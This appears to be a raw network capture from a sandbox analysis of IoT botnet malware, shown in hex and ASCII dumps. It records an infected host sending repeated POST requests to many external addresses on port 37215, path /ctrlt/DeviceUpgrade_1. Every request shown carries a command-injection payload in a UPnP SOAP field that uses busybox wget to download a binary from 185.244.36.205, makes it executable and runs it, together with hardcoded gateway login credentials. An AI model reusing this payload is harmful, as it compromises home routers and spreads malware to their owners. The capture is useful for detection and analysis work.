                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              544192.168.2.154581845.8.159.8837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.721172094 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              545192.168.2.1541314222.77.54.23437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.721205950 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              546192.168.2.1553838138.185.143.1837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.721220970 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              547192.168.2.155238645.147.220.137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.721256018 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              548192.168.2.1543768197.57.47.2537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.721271038 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              549192.168.2.154549294.100.15.7537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.721287012 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              550192.168.2.1559968121.183.171.9137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.721287012 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              551192.168.2.154293237.211.198.19937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.721287012 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              552192.168.2.1540600197.35.144.23637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.721307039 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              553192.168.2.1542770121.165.239.13237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.721354961 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              554192.168.2.154651494.228.26.3637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.721357107 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
